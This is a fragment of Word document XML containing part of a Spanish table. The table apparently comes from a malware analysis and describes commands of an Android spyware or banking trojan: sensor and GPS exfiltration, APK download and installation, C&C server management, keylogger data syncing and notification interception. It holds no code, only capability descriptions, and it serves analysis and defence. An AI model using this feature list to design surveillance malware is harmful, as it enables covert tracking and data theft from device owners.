          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B76664E" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Modifica los valores de co</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>nexión con servidores C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="6BC42694" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2554465B" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>sensors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D1BE1E8" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">start </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B65ABF" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Comienza la escucha de sensores del dispositivo a través de SensorManager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="622BC62B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F08E9C2" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73FCAA30" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F19F729" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Detiene la escucha de eventos de sensores mediante SensorManager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="5F8D3C6F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="445E5D80" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7335D755" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7392BDEE" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Obtiene los datos de los sensores vinculados y los exfiltra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="3626864D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48545A98" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>loader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6724651D" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Subcomando download junto con URL de descarga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A47F8F3" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Descarga de APK a través URL remota</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="3B2F39F0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EFB13C2" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0131E6E0" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7272DA57" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Instalación de APK descargada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D32BF" w14:paraId="1287A2B3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DCE74A5" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>dynamicsocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="145DAA39" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Datos del socket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6857FCBC" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Creación de nuevo socket de conexión</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="23889ED2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78795DCD" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63108B30" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CB8AB19" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Obtiene información de servers C&amp;C de la base de datos local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="0BF895C2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B41B5BB" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E59FCD" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E303F49" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Añade entrada de servidor C&amp;C a la base de datos local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="45B0D993" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A95FCD4" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47114A8D" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D65CE86" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Comprueba la información local de servers C&amp;C y la actualiza en función de la disponibilidad encontrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="3662A8F8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C97AFA6" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523A4593" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>synchronize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="208C032D" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exfiltra data de comandos e información keylogger de la base de datos local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D32BF" w14:paraId="133BE844" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01F900D9" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>gps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A234A3" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11CA26B7" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Trata de obtener la localización GPS del dispositivo y exfiltrarla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="2A62168C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4A2B80" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4473D38C" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>make</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A877A0D" w14:textId="63CFD741" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Crea una notificación push </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>con los detalles proporcionados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="09812DC8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1007B9D3" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="137099A3" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ignore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C2CEB7" w14:textId="470D7F4C" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Ignora notificaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="40C5709F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BC60954" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3760B3C8" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>intercept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13DDD873" w14:textId="49C2216F" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Intercepta detalles acerca de las notificaciones generadas en el dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D18CB" w14:paraId="4B31EAE3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="717E4A1E" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14EE503F" w14:textId="77777777" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15893138" w14:textId="3FD0DF8A" w:rsidR="001D18CB" w:rsidRDefault="001D18CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cambia el valor de la entrada push_write en las preferencias locales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
